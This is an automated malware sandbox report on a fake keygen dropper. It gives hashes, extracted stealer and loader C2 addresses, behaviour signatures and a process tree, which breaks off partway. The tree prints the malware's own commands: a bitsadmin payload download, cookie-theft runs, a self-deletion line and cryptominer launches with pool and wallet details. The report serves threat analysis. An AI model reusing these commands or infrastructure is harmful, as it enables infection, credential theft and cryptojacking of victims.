Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1014s
  • max time network
    1019s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    27-04-2021 19:43

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 57 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 12 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • NTFS ADS 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1816
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {4AE5A73B-6F5B-4164-8A50-920B78A9FD04} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:3052
              • C:\Users\Admin\AppData\Roaming\hbdhfbi
                C:\Users\Admin\AppData\Roaming\hbdhfbi
                4⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:1352
              • C:\Users\Admin\AppData\Roaming\sgdhfbi
                C:\Users\Admin\AppData\Roaming\sgdhfbi
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1032
                • C:\Users\Admin\AppData\Roaming\sgdhfbi
                  C:\Users\Admin\AppData\Roaming\sgdhfbi
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:1624
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {2E1CD774-5605-4087-8BB0-02B84C533689} S-1-5-18:NT AUTHORITY\System:Service:
              3⤵
                PID:1848
                • C:\Windows\system32\rundll32.exe
                  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll",orIRpJxOmHOi
                  4⤵
                  • Windows security modification
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  PID:1048
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              • Modifies registry class
              PID:1432
          • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
            "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
            1⤵
            • Loads dropped DLL
            • Checks whether UAC is enabled
            • Suspicious use of WriteProcessMemory
            PID:756
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1352
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                3⤵
                • Loads dropped DLL
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:652
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:780
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1796
              • C:\Users\Admin\AppData\Local\Temp\is-4ATEM.tmp\Install.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-4ATEM.tmp\Install.tmp" /SL5="$3017A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1580
                • C:\Users\Admin\AppData\Local\Temp\is-UC1L8.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-UC1L8.tmp\Ultra.exe" /S /UID=burnerch1
                  4⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Modifies system certificate store
                  • Suspicious use of WriteProcessMemory
                  PID:1780
                  • C:\Program Files\MSBuild\DCBHZMRRLZ\ultramediaburner.exe
                    "C:\Program Files\MSBuild\DCBHZMRRLZ\ultramediaburner.exe" /VERYSILENT
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1384
                    • C:\Users\Admin\AppData\Local\Temp\is-KAUMS.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-KAUMS.tmp\ultramediaburner.tmp" /SL5="$10190,281924,62464,C:\Program Files\MSBuild\DCBHZMRRLZ\ultramediaburner.exe" /VERYSILENT
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:1704
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        7⤵
                        • Executes dropped EXE
                        PID:1572
                  • C:\Users\Admin\AppData\Local\Temp\75-9f2f4-6c6-d1498-1d7a5df0e3644\SHybuganaeki.exe
                    "C:\Users\Admin\AppData\Local\Temp\75-9f2f4-6c6-d1498-1d7a5df0e3644\SHybuganaeki.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1156
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                      6⤵
                      • Modifies Internet Explorer settings
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:268
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:268 CREDAT:275457 /prefetch:2
                        7⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1608
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:268 CREDAT:275474 /prefetch:2
                        7⤵
                        • Modifies Internet Explorer settings
                        • NTFS ADS
                        • Suspicious use of SetWindowsHookEx
                        PID:2688
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:268 CREDAT:930837 /prefetch:2
                        7⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2528
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                      6⤵
                        PID:2588
                    • C:\Users\Admin\AppData\Local\Temp\4f-123a2-ced-6b9b1-8dbaf712f8af2\Paewazhuwela.exe
                      "C:\Users\Admin\AppData\Local\Temp\4f-123a2-ced-6b9b1-8dbaf712f8af2\Paewazhuwela.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1104
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40geziz0.yll\001.exe & exit
                        6⤵
                          PID:2660
                          • C:\Users\Admin\AppData\Local\Temp\40geziz0.yll\001.exe
                            C:\Users\Admin\AppData\Local\Temp\40geziz0.yll\001.exe
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Modifies data under HKEY_USERS
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1948
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fmcyxshv.m4m\gpooe.exe & exit
                          6⤵
                            PID:2444
                            • C:\Users\Admin\AppData\Local\Temp\fmcyxshv.m4m\gpooe.exe
                              C:\Users\Admin\AppData\Local\Temp\fmcyxshv.m4m\gpooe.exe
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2084
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:1736
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:2092
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:2264
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dcivt2ff.eyz\google-game.exe & exit
                            6⤵
                              PID:1072
                              • C:\Users\Admin\AppData\Local\Temp\dcivt2ff.eyz\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\dcivt2ff.eyz\google-game.exe
                                7⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:3008
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  8⤵
                                    PID:2140
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\azjzbnii.ot4\askinstall39.exe & exit
                                6⤵
                                • Blocklisted process makes network request
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of SetThreadContext
                                • Modifies system certificate store
                                PID:1972
                                • C:\Users\Admin\AppData\Local\Temp\azjzbnii.ot4\askinstall39.exe
                                  C:\Users\Admin\AppData\Local\Temp\azjzbnii.ot4\askinstall39.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:1412
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    8⤵
                                      PID:468
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        9⤵
                                        • Kills process with taskkill
                                        PID:3044
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kycglxoz.mkr\requête.exe & exit
                                  6⤵
                                    PID:2468
                                    • C:\Users\Admin\AppData\Local\Temp\kycglxoz.mkr\requête.exe
                                      C:\Users\Admin\AppData\Local\Temp\kycglxoz.mkr\requête.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:2232
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                        8⤵
                                          PID:2592
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ewr5azn.lpd\SunLabsPlayer.exe /S & exit
                                      6⤵
                                        PID:1964
                                        • C:\Users\Admin\AppData\Local\Temp\5ewr5azn.lpd\SunLabsPlayer.exe
                                          C:\Users\Admin\AppData\Local\Temp\5ewr5azn.lpd\SunLabsPlayer.exe /S
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:2952
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                            8⤵
                                              PID:1116
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                              8⤵
                                                PID:1272
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                8⤵
                                                  PID:468
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                  8⤵
                                                  • Drops file in Program Files directory
                                                  PID:2904
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:2940
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:1072
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                      8⤵
                                                      • Checks for any installed AV software in registry
                                                      PID:1672
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                      8⤵
                                                      • Download via BitsAdmin
                                                      PID:2604
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pHlkK8TOjY8FNbWF -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:1576
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqi2C5HpEuJvfOs0 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:1320
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:588
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2052
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Drops file in Program Files directory
                                                          PID:1840
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:2400
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:2172
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll" orIRpJxOmHOi
                                                              8⤵
                                                                PID:2596
                                                                • C:\Windows\system32\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll" orIRpJxOmHOi
                                                                  9⤵
                                                                  • Drops file in System32 directory
                                                                  PID:1072
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                                8⤵
                                                                • Drops file in Program Files directory
                                                                PID:1248
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:1824
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:1776
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:1028
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7532.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2172
                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:2244
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\noc0vljc.lnc\005.exe & exit
                                                                6⤵
                                                                  PID:2184
                                                                  • C:\Users\Admin\AppData\Local\Temp\noc0vljc.lnc\005.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\noc0vljc.lnc\005.exe
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                    PID:2292
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3bv41tve.mmz\GcleanerWW.exe /mixone & exit
                                                                  6⤵
                                                                    PID:2368
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s5gatbu3.4cf\toolspab1.exe & exit
                                                                    6⤵
                                                                      PID:2424
                                                                      • C:\Users\Admin\AppData\Local\Temp\s5gatbu3.4cf\toolspab1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\s5gatbu3.4cf\toolspab1.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                        PID:3052
                                                                        • C:\Users\Admin\AppData\Local\Temp\s5gatbu3.4cf\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\s5gatbu3.4cf\toolspab1.exe
                                                                          8⤵
                                                                            PID:2804
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pafdvphi.nir\c7ae36fa.exe & exit
                                                                        6⤵
                                                                          PID:952
                                                                          • C:\Users\Admin\AppData\Local\Temp\pafdvphi.nir\c7ae36fa.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\pafdvphi.nir\c7ae36fa.exe
                                                                            7⤵
                                                                              PID:2868
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:1948
                                                                    • C:\Users\Admin\AppData\Roaming\8143.tmp.exe
                                                                      "C:\Users\Admin\AppData\Roaming\8143.tmp.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1416
                                                                      • C:\Users\Admin\AppData\Roaming\8143.tmp.exe
                                                                        "C:\Users\Admin\AppData\Roaming\8143.tmp.exe"
                                                                        4⤵
                                                                          PID:2152
                                                                      • C:\Users\Admin\AppData\Roaming\8559.tmp.exe
                                                                        "C:\Users\Admin\AppData\Roaming\8559.tmp.exe"
                                                                        3⤵
                                                                          PID:1972
                                                                          • C:\Windows\system32\msiexec.exe
                                                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w13848@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                            4⤵
                                                                              PID:2424
                                                                            • C:\Windows\system32\msiexec.exe
                                                                              -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w31038 --cpu-max-threads-hint 50 -r 9999
                                                                              4⤵
                                                                              • Blocklisted process makes network request
                                                                              PID:2456
                                                                          • C:\Users\Admin\AppData\Roaming\878B.tmp.exe
                                                                            "C:\Users\Admin\AppData\Roaming\878B.tmp.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:2076
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                            3⤵
                                                                              PID:3060
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping 127.0.0.1
                                                                                4⤵
                                                                                • Runs ping.exe
                                                                                PID:2180
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:2672
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:2776
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:2296
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
